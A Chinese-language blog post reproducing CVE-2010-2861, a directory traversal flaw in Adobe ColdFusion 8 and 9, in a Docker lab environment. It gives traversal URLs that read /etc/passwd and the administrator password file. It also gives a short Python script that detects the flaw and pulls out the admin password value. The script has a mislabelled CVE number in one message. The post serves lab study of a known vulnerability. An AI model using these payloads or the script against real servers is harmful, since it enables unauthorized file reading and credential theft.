CVE-2010-2861 recurrent
前言
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
正文
从Vulhub - Docker-Compose file for vulnerability environment下载好docker环境找到对应的CVE环境然后执行
docker-compose up -d
之后访问
http://127.0.0.1:8500/
看到以下:
直接访问
读取/etc/passwd :http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
读取管理员密码:<http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
即可读取文件
简单的漏洞检测脚本
''''
author:九世
time:2019/1/26
source:https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/
'''
import requests
import re
def exploit(url):
payload='/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en'
guanjianzi='/bin/bash'
payload2='/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en'
urls=str(url).rstrip('/').strip()+payload
urls2=str(url).rstrip('/').strip()+payload2
headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
try:
rqt=requests.get(url=urls,headers=headers,timeout=10)
if guanjianzi in rqt.text:
id=1
print('[+] Found CVE-2010-2861')
else:
id=0
print('[-] Not Found CVE-2018-2861')
uuid=id
if uuid>0:
rqs=requests.get(url=urls2,headers=headers,timeout=10)
passwd=re.findall('password=[0-9-A-Z].*',rqs.text)
print('[+] administrator password:{}'.format(passwd[0]))
except Exception as r:
print('[!] Error {}'.format(r))
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:CVE-2010-2861 recurrent
本文作者:九世
发布时间:2019-01-26, 20:43:10
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/81167905.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。